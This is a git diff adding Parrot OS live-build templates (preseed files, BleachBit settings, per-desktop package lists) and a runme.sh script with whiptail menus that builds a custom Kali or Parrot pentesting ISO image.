b/modules/parrot-build/templates/common/includes.chroot/root/.config/bleachbit/bleachbit.ini @@ -0,0 +1,36 @@ +[bleachbit] +auto_start = False +check_beta = False +check_online_updates = True + + +[preserve_languages] +en = True +es = True +id = True +it = True +pt = True +fr = True +de = True + +[tree] +bash = True +bash.history = True +deepscan = True +deepscan.ds_store = True +deepscan.backup = True +deepscan.tmp = True +deepscan.thumbs_db = True +system = True +system.desktop_entry = True +system.cache = True +system.clipboard = True +system.custom = True +system.localizations = True +system.recent_documents = True +system.rotated_logs = True +system.tmp = True +system.trash = True +x11 = True +x11.debug_logs = True + diff --git a/modules/parrot-build/templates/common/includes.chroot/usr/share/applications/debian-installer-launcher.desktop b/modules/parrot-build/templates/common/includes.chroot/usr/share/applications/debian-installer-launcher.desktop new file mode 100644 index 00000000..30335c07 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.chroot/usr/share/applications/debian-installer-launcher.desktop @@ -0,0 +1,10 @@ +[Desktop Entry] +Version=1.0 +Name=Install Parrot +Comment=Install this system permanently to your hard disk +Exec=menuexec mate-terminal --hide-menubar --name="Parrot Installer" -e '/usr/sbin/debian-installer-launcher' +Icon=debian-installer-launcher +Type=Application +Categories=Application;System; +StartupNotify=true +Terminal=false diff --git a/modules/parrot-build/templates/common/includes.installer/etc/hostname b/modules/parrot-build/templates/common/includes.installer/etc/hostname new file mode 100644 index 00000000..2785d83b --- /dev/null +++ b/modules/parrot-build/templates/common/includes.installer/etc/hostname @@ -0,0 +1 @@ +parrot diff --git a/modules/parrot-build/templates/common/includes.installer/preseed.cfg b/modules/parrot-build/templates/common/includes.installer/preseed.cfg new file mode 100644 index 00000000..b12f0239 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.installer/preseed.cfg @@ -0,0 +1,76 @@ +# Disable volatile and security +d-i apt-setup/services-select multiselect + +# Enable contrib and non-free +d-i apt-setup/non-free boolean true +d-i apt-setup/contrib boolean true + +# Disable CDROM entries after install +d-i apt-setup/disable-cdrom-entries boolean true + +### Network configuration +# Disable network configuration entirely. This is useful for cdrom +# installations on non-networked devices where the network questions, +# warning and long timeouts are a nuisance. +d-i netcfg/enable boolean false + +# If non-free firmware is needed for the network or other hardware, you can +# configure the installer to always try to load it, without prompting. Or +# change to false to disable asking. +d-i hw-detect/load_firmware boolean false + + +# If you prefer to configure the network manually, uncomment this line and +# the static network configuration below. +d-i netcfg/disable_dhcp boolean true + +#disabling mirrors selection +d-i apt-setup/use_mirror boolean false + +# Disable CDROM entries after install +d-i apt-setup/disable-cdrom-entries boolean true + +# Packages +#d-i pkgsel/upgrade select full-upgrade +# install Parrot Security +#d-i pkgsel/include string parrot-core parrot-interface parrot-tools +# install Parrot Cloud +#d-i pkgsel/include string parrot-core parrot-cloud parrot-tools-cloud + +# Change default hostname +d-i netcfg/get_hostname string parrot +# d-i netcfg/get_hostname seen false + +# user creation +d-i passwd/root-login boolean false +d-i passwd/make-user boolean true +d-i passwd/user-default-groups string audio cdrom dip floppy video plugdev netdev powerdev scanner bluetooth debian-tor sudo libvirt fuse dialout + +# Use the following option to add additional boot parameters for the +# installed system (if supported by the bootloader installer). +# Note: options passed to the installer will be added automatically. +#d-i debian-installer/add-kernel-opts string noautomount nouveau.blacklist=1 splash + +# Disable popularity-contest +popularity-contest popularity-contest/participate boolean false + +# Select udeb for installation to allow exiting the installer +d-i anna/choose_modules string di-utils-exit-installer + +# Ask question regardless from that it's preseeded above +d-i anna/choose_modules seen false + +# When disk encryption is enabled, skip wiping the partitions beforehand. +d-i partman-auto-crypto/erase_disks boolean false + + + +# Skip the exit timeout +#d-i di-utils-reboot/really_reboot boolean false +#d-i finish-install/reboot_in_progress note + + + +#### Advanced options +### Running custom commands during the installation +#d-i preseed/late_command string in-target "rm /root/Desktop/debian-installer-launcher.desktop" diff --git a/modules/parrot-build/templates/common/includes.installer/usr/share/graphics/logo_debian.png b/modules/parrot-build/templates/common/includes.installer/usr/share/graphics/logo_debian.png new file mode 100644 index 00000000..418bf8fd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.installer/usr/share/graphics/logo_debian.png differ diff --git a/modules/parrot-build/templates/common/package-lists/standard.list.chroot b/modules/parrot-build/templates/common/package-lists/standard.list.chroot new file mode 100644 index 00000000..802e72ab --- /dev/null +++ b/modules/parrot-build/templates/common/package-lists/standard.list.chroot @@ -0,0 +1,79 @@ +#standard packages +! Packages Priority standard +eatmydata + +#installer +debian-installer-launcher + +#if ARCHITECTURES amd64 + linux-image-amd64 + linux-headers-amd64 +#endif + +#if ARCHITECTURES i386 + linux-image-686-pae + linux-headers-686-pae +#endif + +# virtualization +open-vm-tools + +# parrot metapackages +apt-parrot +parrot-core + +# provide l10n for everybody +locales-all +console-setup + +#if ARCHITECTURES armel armhf + cgpt + vboot-utils + vboot-kernel-utils +#endif + +#important stuff +cowsay +cryptsetup +ethtool +iw +lvm2 +mdadm +openvpn +parted +bash-completion +resolvconf +initramfs-tools +rng-tools +haveged +live-config + +#security +apparmor +apparmor-profiles +apparmor-profiles-extra +apparmor-utils +firejail + +#filesystem support +jfsutils +hfsplus +hfsutils +hfsprogs +btrfs-tools +btrfs-progs +e2fsprogs +dosfstools +mtools +reiser4progs +reiserfsprogs +xfsprogs +xfsdump + +#additional stuff +xserver-xorg-video-all +xserver-xorg-video-cirrus +xserver-xorg-video-mga +vim-nox +plymouth +plymouth-themes diff --git a/modules/parrot-build/templates/common/package-lists/uefi.list.binary b/modules/parrot-build/templates/common/package-lists/uefi.list.binary new file mode 100644 index 00000000..e7635d1f --- /dev/null +++ b/modules/parrot-build/templates/common/package-lists/uefi.list.binary @@ -0,0 +1,6 @@ +#if ARCHITECTURES i386 +grub-pc +#endif +#if ARCHITECTURES amd64 +grub-efi +#endif diff --git a/modules/parrot-build/templates/common/preseed/firmware b/modules/parrot-build/templates/common/preseed/firmware new file mode 100644 index 00000000..d80ef863 --- /dev/null +++ b/modules/parrot-build/templates/common/preseed/firmware @@ -0,0 +1,4 @@ +b43-fwcutter b43-fwcutter/cut_firmware boolean true +firmware-ipw2x00 firmware-ipw2x00/license/accepted boolean true +firmware-iwlwifi firmware-iwlwifi/license/accepted boolean true +firmware-ralink firmware-ralink/license/accepted boolean true diff --git a/modules/parrot-build/templates/common/preseed/inetd.cfg.chroot b/modules/parrot-build/templates/common/preseed/inetd.cfg.chroot new file mode 100644 index 00000000..dd393390 --- /dev/null +++ b/modules/parrot-build/templates/common/preseed/inetd.cfg.chroot @@ -0,0 +1,3 @@ +# Do not register it in inetd so that its status can be controlled +# individually +atftpd atftpd/use_inetd boolean false diff --git a/modules/parrot-build/templates/common/preseed/live-boot b/modules/parrot-build/templates/common/preseed/live-boot new file mode 100644 index 00000000..4db3bb90 --- /dev/null +++ b/modules/parrot-build/templates/common/preseed/live-boot @@ -0,0 +1,2 @@ +live-boot live-boot/smem boolean true +live-boot live-boot/sdmem boolean true diff --git a/modules/parrot-build/templates/common/preseed/wireshark b/modules/parrot-build/templates/common/preseed/wireshark new file mode 100644 index 00000000..20916621 --- /dev/null +++ b/modules/parrot-build/templates/common/preseed/wireshark @@ -0,0 +1 @@ +wireshark wireshark-common/install-setuid: true diff --git a/modules/parrot-build/templates/parrot-home/hooks/home-hooks.hook.chroot b/modules/parrot-build/templates/parrot-home/hooks/home-hooks.hook.chroot new file mode 120000 index 00000000..2a44a02d --- /dev/null +++ b/modules/parrot-build/templates/parrot-home/hooks/home-hooks.hook.chroot @@ -0,0 +1 @@ +normal/home-hooks.hook.chroot \ No newline at end of file diff --git a/modules/parrot-build/templates/parrot-home/hooks/normal/home-hooks.hook.chroot b/modules/parrot-build/templates/parrot-home/hooks/normal/home-hooks.hook.chroot new file mode 100755 index 00000000..b5ebe005 --- /dev/null +++ b/modules/parrot-build/templates/parrot-home/hooks/normal/home-hooks.hook.chroot @@ -0,0 +1,6 @@ +#!/bin/bash +set -e +export DEBIAN_FRONTEND=noninteractive + +echo "Removing useless stuff" +apt-get purge -y openjdk-8-* || true diff --git a/modules/parrot-build/templates/parrot-home/package-lists/parrot-home.list.chroot b/modules/parrot-build/templates/parrot-home/package-lists/parrot-home.list.chroot new file mode 100644 index 00000000..aa412b54 --- /dev/null +++ b/modules/parrot-build/templates/parrot-home/package-lists/parrot-home.list.chroot @@ -0,0 +1,26 @@ +## parrot metapackages +parrot-interface +parrot-mate +parrot-drivers + +# parrot tools +parrot-updater +anonsurf + +## home packages +vlc +geany +atom +electrum +zulucrypt +ricochet-im +libreoffice +keepassxc +homebank +vym +planner +rhythmbox +shotwell +cheese +qbittorrent +gimp diff --git a/modules/parrot-build/templates/parrot-security/package-lists/parrot-security.list.chroot b/modules/parrot-build/templates/parrot-security/package-lists/parrot-security.list.chroot new file mode 100644 index 00000000..1a7cee7f --- /dev/null +++ b/modules/parrot-build/templates/parrot-security/package-lists/parrot-security.list.chroot @@ -0,0 +1,22 @@ +## parrot metapackages +parrot-interface +parrot-mate +parrot-tools-full +parrot-drivers + +## other packages +ricochet-im +vlc +mpv +telnet +zeal +keepassxc +homebank +vym +planner +libreoffice +qbittorrent + +emacs-nox +atom +geany diff --git a/modules/parrot-build/templates/parrot-studio/package-lists/parrot-studio.list.chroot b/modules/parrot-build/templates/parrot-studio/package-lists/parrot-studio.list.chroot new file mode 100644 index 00000000..e373447a --- /dev/null +++ b/modules/parrot-build/templates/parrot-studio/package-lists/parrot-studio.list.chroot @@ -0,0 +1,58 @@ +## parrot metapackages +parrot-interface +parrot-mate +parrot-interface-full +parrot-drivers + + +##video editing +blender +kdenlive +flowblade +lightworks + +handbrake +winff + +##audio editing +lmms +audacity +mixxx +rhythmbox + +##graphics +gimp +krita +#freecad +inkscape +scribus +darktable +shotwell +cheese + +##gaming +#steam-launcher + +##development +atom +geany +zeal + + +## other packages +qbittorrent +vinagre +vlc +mpv +electrum +keepassxc +homebank +vym +planner +playonlinux +winetricks +stellarium +kalzium +geogebra +fritzing +tkgate diff --git a/modules/parrot-build/templates/parrot-studio/packages.chroot/Lightworks-145RC11-108471-14.5.0.0.deb.REMOVED.git-id b/modules/parrot-build/templates/parrot-studio/packages.chroot/Lightworks-145RC11-108471-14.5.0.0.deb.REMOVED.git-id new file mode 100644 index 00000000..098cacb2 --- /dev/null +++ b/modules/parrot-build/templates/parrot-studio/packages.chroot/Lightworks-145RC11-108471-14.5.0.0.deb.REMOVED.git-id @@ -0,0 +1 @@ +5dac39c81c5b7313ed933ee9e1b8629ed619dc35 \ No newline at end of file diff --git a/modules/parrot-build/templates/parrot-studio/packages.chroot/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb b/modules/parrot-build/templates/parrot-studio/packages.chroot/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb new file mode 100644 index 00000000..3ccbb89d Binary files /dev/null and b/modules/parrot-build/templates/parrot-studio/packages.chroot/libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb differ diff --git a/modules/parrot-build/templates/parrot-variant-cinnamon/package-lists/parrot-cinnamon.list.chroot b/modules/parrot-build/templates/parrot-variant-cinnamon/package-lists/parrot-cinnamon.list.chroot new file mode 100644 index 00000000..0069d8f0 --- /dev/null +++ b/modules/parrot-build/templates/parrot-variant-cinnamon/package-lists/parrot-cinnamon.list.chroot @@ -0,0 +1,21 @@ +## parrot metapackages +apt-parrot +parrot-core +parrot-interface +parrot-mini +parrot-drivers +parrot-tools-full + +## other packages +vinagre +etherape +torchat +vlc +mpv +electrum +electrum-ltc + +## desktop environment +parrot-cinnamon + +anonsurf diff --git a/modules/parrot-build/templates/parrot-variant-gnome/package-lists/parrot-gnome.list.chroot b/modules/parrot-build/templates/parrot-variant-gnome/package-lists/parrot-gnome.list.chroot new file mode 100644 index 00000000..94a1f940 --- /dev/null +++ b/modules/parrot-build/templates/parrot-variant-gnome/package-lists/parrot-gnome.list.chroot @@ -0,0 +1,22 @@ +## parrot metapackages +apt-parrot +parrot-core +parrot-interface +parrot-mini +parrot-drivers +parrot-tools-full + +## other packages +vinagre +etherape +torchat +vlc +mpv +galculator +electrum +electrum-ltc + +## desktop environment +parrot-gnome + +anonsurf diff --git a/modules/parrot-build/templates/parrot-variant-kde/package-lists/parrot-kde.list.chroot b/modules/parrot-build/templates/parrot-variant-kde/package-lists/parrot-kde.list.chroot new file mode 100644 index 00000000..dfefe177 --- /dev/null +++ b/modules/parrot-build/templates/parrot-variant-kde/package-lists/parrot-kde.list.chroot @@ -0,0 +1,23 @@ +## parrot metapackages +parrot-interface +parrot-kde +sddm +parrot-drivers +parrot-tools-full + +## other packages +vlc +electrum +zulucrypt +ricochet-im +libreoffice-writer +libreoffice-calc +libreoffice-impress +keepassxc +homebank +vym +planner + +parrot-updater + +anonsurf diff --git a/modules/parrot-build/templates/parrot-variant-lxde/package-lists/parrot-lxde.list.chroot b/modules/parrot-build/templates/parrot-variant-lxde/package-lists/parrot-lxde.list.chroot new file mode 100644 index 00000000..8bc2dc09 --- /dev/null +++ b/modules/parrot-build/templates/parrot-variant-lxde/package-lists/parrot-lxde.list.chroot @@ -0,0 +1,20 @@ +## parrot metapackages +apt-parrot +parrot-core +parrot-interface +parrot-mini +parrot-drivers + +## other packages +vinagre +etherape +torchat +vlc +mpv +electrum +electrum-ltc + +## desktop environment +parrot-lxde + +anonsurf diff --git a/modules/parrot-build/templates/parrot-variant-mate/package-lists/parrot-security.list.chroot b/modules/parrot-build/templates/parrot-variant-mate/package-lists/parrot-security.list.chroot new file mode 100644 index 00000000..1a7cee7f --- /dev/null +++ b/modules/parrot-build/templates/parrot-variant-mate/package-lists/parrot-security.list.chroot @@ -0,0 +1,22 @@ +## parrot metapackages +parrot-interface +parrot-mate +parrot-tools-full +parrot-drivers + +## other packages +ricochet-im +vlc +mpv +telnet +zeal +keepassxc +homebank +vym +planner +libreoffice +qbittorrent + +emacs-nox +atom +geany diff --git a/modules/parrot-build/templates/parrot-variant-xfce/package-lists/parrot-xfce.list.chroot b/modules/parrot-build/templates/parrot-variant-xfce/package-lists/parrot-xfce.list.chroot new file mode 100644 index 00000000..f99d68a8 --- /dev/null +++ b/modules/parrot-build/templates/parrot-variant-xfce/package-lists/parrot-xfce.list.chroot @@ -0,0 +1,21 @@ +## parrot metapackages +apt-parrot +parrot-core +parrot-interface +parrot-mini +parrot-drivers + +## other packages +vinagre +etherape +torchat +vlc +mpv +galculator +electrum +electrum-ltc + +## desktop environment +parrot-xfce + +anonsurf diff --git a/runme.sh b/runme.sh new file mode 100755 index 00000000..41bd564d --- /dev/null +++ b/runme.sh @@ -0,0 +1,70 @@ +#!/bin/bash + +function pause(){ + read -p "$*" +} + +#Root check! +if [ "$EUID" -ne 0 ] +then + whiptail --backtitle "Pentest Build Script" --title "NOT ROOT" --msgbox "YOU ARE NOT ROOT. PLEASE RUN THIS SCRIPT AS ROOT." 10 55 + exit 1 +fi + +whiptail --backtitle "Pentest Build Script" --title "Welcome" --msgbox "This script will help you build a custom pentesting distribution." 7 70 + +DISTRO=$(whiptail --backtitle "Pentest Build Script" --title "Distribution" --menu "Choose a distribution:" 10 40 2 \ +"KALI" "Kali Linux" \ +"PARROT" "Parrot Security OS" 3>&1 1>&2 2>&3) + +DESKTOP=$(whiptail --backtitle "Pentest Build Script" --title "Desktop Environment" --menu "Choose a desktop environment:" 10 40 4 \ +"gnome" "GNOME" \ +"mate" "MATE Desktop Environment" \ +"cinnamon" "Cinnamon Desktop Environment" \ +"kde" "K Desktop Environment" 3>&1 1>&2 2>&3) + +if (whiptail --backtitle "Pentest Build Script" --title "Confirmation" --yesno "We're going to build: +Distribution: $DISTRO +Desktop Environment: $DESKTOP +Shall we proceed?" 10 50) +then + whiptail --backtitle "Pentest Build Script" --title "Build Time!" --msgbox "This will take a while. Press OK to proceed." 8 30 +else + whiptail --backtitle "Pentest Build Script" --title "OK" --msgbox "This script will now terminate." 8 35 + exit 1 +fi + +#This is the stuff that's common to both distros +dpkg-name ./debs/*.deb +rm -rf build +mkdir build +apt install git build-essential cdebootstrap live-build curl wget + +case $DISTRO in +KALI) + cp -rv ./modules/live-build-config ./build/ + mkdir ./build/live-build-config/kali-config/variant-$DESKTOP/packages.chroot + cp ./debs/*.deb build/live-build-config/kali-config/variant-$DESKTOP/packages.chroot/ + cp -rv filesystem/* ./build/live-build-config/kali-config/common/includes.chroot/ + cp config/02-unattended-boot.binary ./build/live-build-config/kali-config/common/includes.installer/ + cp config/preseed.cfg ./build/live-build-config/kali-config/common/includes.installer/ + cp config/software.list.chroot ./build/live-build-config/kali-config/variant-$DESKTOP/ + cd build/live-build-config + pause "Check to make sure everything's good, then hit enter..." + ./build.sh --distribution kali-rolling --variant $DESKTOP --verbose + whiptail --backtitle "Pentest Build Script" --title "Finished" --msgbox "Fingers crossed there were no errors... Your image should be done!" 7 70 + exit 0 +;; +PARROT) + cp -rv ./modules/parrot-build ./build/ + mkdir ./build/parrot-build/templates/parrot-variant-$DESKTOP/packages.chroot + cp ./debs/*.deb build/parrot-build/templates/parrot-variant-$DESKTOP/packages.chroot/ + cp -rv filesystem/* ./build/parrot-build/templates/common/includes.chroot/ + cp config/software.list.chroot ./build/parrot-build/templates/parrot-variant-$DESKTOP/ + cd build/parrot-build + pause "Check to make sure everything's good, then hit enter..." + ./build.sh build variant-$DESKTOP amd64 + whiptail --backtitle "Pentest Build Script" --title "Finished" --msgbox "Fingers crossed there were no errors... Your image should be done!" 7 70 + exit 0 +;; +esac